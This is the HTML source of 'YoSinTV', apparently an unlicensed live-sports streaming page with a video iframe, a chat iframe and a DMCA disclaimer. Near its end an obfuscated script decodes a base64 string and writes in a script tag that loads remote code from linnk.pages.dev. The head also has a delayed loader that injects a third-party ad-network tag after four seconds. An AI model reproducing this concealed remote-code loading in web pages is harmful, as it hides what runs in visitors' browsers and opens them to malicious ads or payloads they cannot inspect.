<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>YoSinTV: Live Sports </title>
    <link rel="icon" href="favicon.png" type="image/x-icon">
    <link rel="stylesheet" href="https://linnk.pages.dev/style.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&family=Merriweather:wght@700&display=swap">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <script type="application/ld+json">
        {
            "@context": "http://schema.org/",
            "@type": "WebSite",
            "name": "YoSinTV",
            "alternateName": "YoSinTV",
            "url": "https://www.yosin-tv.net/"
        }
    </script>
    

<script>
(function () {
    setTimeout(function () {
        (function(s, u, z, p) {
            s.src = u;
            s.setAttribute('data-zone', z);
            p.appendChild(s);
        })(document.createElement('script'), 'https://bvtpk.com/tag.min.js', 7463304, document.body || document.documentElement);
    }, 4000);
})();
</script>

	
</head>
<body class="theme-light">
    <header class="header">
        <div class="container">
            <a href="https://www.yosin-tv.net/" class="logo">YoSinTV</a>
            <button class="mode-toggle" onclick="rdmode()">
                <i class="fas fa-moon"></i>
                <span>Dark Mode</span>
            </button>
        </div>
    </header>

	
    <main class="container">
        <section class="player-section">
            <div class="player-container">
                <div class="share-section">
                    <h3 class="share-title">Share This Live Stream</h3>
                    <div class="share-container">
                        <div id="shareLinkBox">Generating shortened link...</div>
                        <button class="share-button" onclick="copyToClipboard()">
                            <span class="button-text">Copy Link</span>
                        </button>
                    </div>
                </div>
		    
				    
		    <div class="disclaimer">
                    <span class="disclaimer-text">Skip 1-2 Ads | Watch Peacefully</span>
                </div>
                
                <div class="fullscreen-container">
                    <button class="fullscreen-toggle" onclick="toggleFullscreen()" title="Toggle Fullscreen">
                        <i class="fas fa-expand"></i> Fullscreen
                    </button>
                </div>
                <div class="player-wrapper">
                    <iframe id="iframe" allow="encrypted-media; fullscreen" allowfullscreen="true" frameborder="0" height="500" width="100%"></iframe>
                    <div id="jwPlayer" style="display: none;"></div>
                </div>
            </div>
            <div class="chat-toggle-container">
                <button class="chat-toggle" onclick="toggleChat()" title="Toggle Chat">
                    <i class="fas fa-comment-slash"></i> Hide Comments
                </button>
            </div>
            <div class="chat-section" style="display: block;">
                <iframe height="380" width="100%" src="https://www.yosintv.link/chat"></iframe>
            </div>
        </section>

        <section class="dmca-section">
            <h2>YoSinTV - DMCA</h2>
            <p>YoSinTV does not host any media content on its own site. Our site visitors may use external or third-party services to show content. We notify all copyright owners that the links and media shared by visitors are hosted elsewhere on the web or embedded from various sites.</p>
            <h3>What is YoSinTV?</h3>
            <p>YoSinTV is a sports streaming platform covering Cricket Matches, World Cup, International/Domestic Matches, Football Matches, and more.</p>
        </section>
    </main>

    <footer class="footer">
        <div class="container">
            <ul class="footer-links">
                <li><a href="https://www.yosin-tv.net/"> Home</a></li>
                <li><a href="/about">About</a></li>
                <li><a href="/contact">Contact</a></li>
            </ul>
            <p>© 2025 YoSinTV. All rights reserved.</p>
        </div>
    </footer>
	
	
	<script>
function _0x4711(){const _0x151d19=['1001124JZeHou','711272EBXCeT','9Jswvvg','73480uRVcLS','635358ECGObG','1047005lXPTaO','PHNjcmlwdCBzcmM9Imh0dHBzOi8vbGlubmsucGFnZXMuZGV2L25ldy5qcyI+PC9zY3JpcHQ+','532385EcwugW','53599GuNOMz','6BegtxP'];_0x4711=function(){return _0x151d19;};return _0x4711();}const _0x1f809f=_0x1350;(function(_0x551947,_0xd466e1){const _0x186195=_0x1350,_0x229af5=_0x551947();while(!![]){try{const _0x2e4f18=-parseInt(_0x186195(0x9f))/0x1+-parseInt(_0x186195(0x9b))/0x2+parseInt(_0x186195(0xa1))/0x3+parseInt(_0x186195(0xa2))/0x4+-parseInt(_0x186195(0x9c))/0x5*(-parseInt(_0x186195(0xa0))/0x6)+-parseInt(_0x186195(0x9e))/0x7+-parseInt(_0x186195(0x9a))/0x8*(-parseInt(_0x186195(0x99))/0x9);if(_0x2e4f18===_0xd466e1)break;else _0x229af5['push'](_0x229af5['shift']());}catch(_0xa8641e){_0x229af5['push'](_0x229af5['shift']());}}}(_0x4711,0x4509b));function _0x1350(_0x11253b,_0xe6e0d7){const _0x4711f8=_0x4711();return _0x1350=function(_0x1350dd,_0x35648d){_0x1350dd=_0x1350dd-0x99;let _0x547f60=_0x4711f8[_0x1350dd];return _0x547f60;},_0x1350(_0x11253b,_0xe6e0d7);}const b64=_0x1f809f(0x9d);document['write'](atob(b64));
</script>   
	
	<!-- BEGIN: Powered by Supercounters.com -->
        <div style="position:fixed;top:0;left:0;width:100%;height:1px;overflow:hidden;visibility:hidden;z-index:9999;">
            <script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script>
            <script type="text/javascript"> sc_online_i(1687371,"ffffff","ffffff"); </script>
            <noscript><a href="https://www.supercounters.com/" style="visibility:hidden;">free online counter</a></noscript>
        </div>

</body>
</html>
